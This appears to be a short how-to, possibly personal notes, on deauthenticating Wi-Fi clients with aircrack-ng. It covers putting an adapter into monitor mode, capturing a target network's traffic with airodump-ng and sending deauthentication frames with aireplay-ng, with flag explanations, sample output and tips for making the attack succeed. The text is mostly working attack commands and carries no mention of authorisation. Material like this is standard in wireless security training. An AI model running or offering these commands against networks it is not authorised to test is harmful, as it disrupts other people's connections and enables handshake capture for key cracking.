airmon-ng wlan0
PHY Interface Driver Chipset
phy0 wlan0 mt7921e MEDIATEK Corp. MT7921K (RZ608) Wi-Fi 6E 80MHz
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
airodump-ng wlan0
airodump-ng -c 6 --bssid F8:79:0A:D2:BC:3C -w 'fjohome' wlan0mon
Where:
-c is the channel
--bssid is the MAC of the BSSID
-w is the name of files you will output
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 wlan0
Where:
-0 means deauthentication
1 is the number of deauths to send (you_can_send_multiple_if_you_wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated ath0 is the interface name
Typical Deauthentication First, you determine a client which is currently connected. You need the MAC address for the following command:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D wlan0
Where:
-0 means deauthentication
1 is the number of deauths to send (you_can_send_multiple_if_you_wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing
Here is typical output:
12:35:25 Waiting for beacon frame (BSSID:_00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]
You may simply be too far from the client(s). Your transmit power must be sufficient for packets to reach the clients and be successfully received. When performing a full packet capture, every packet sent to a client should be followed by an ACK packet. The presence of an ACK confirms the client received the transmission; the absence of one strongly suggests it did not.
Wireless adapters operate in specific modes (such as 802.11b, g, n, etc.). If your adapter is operating in a mode incompatible with the clientβs wireless mode, the client may be unable to properly receive your packets. Again, verifying the presence of ACK packets is the best way to confirm reception.
Some clients are configured to ignore broadcast deauthentication frames. In these cases, you must send a deauthentication frame targeted directly at the specific client.
Finally, clients may reconnect so quickly that the disconnection is not obvious. A full packet capture allows you to verify success by checking for reassociation packets, which indicate that the client was briefly disconnected and then rejoined the network.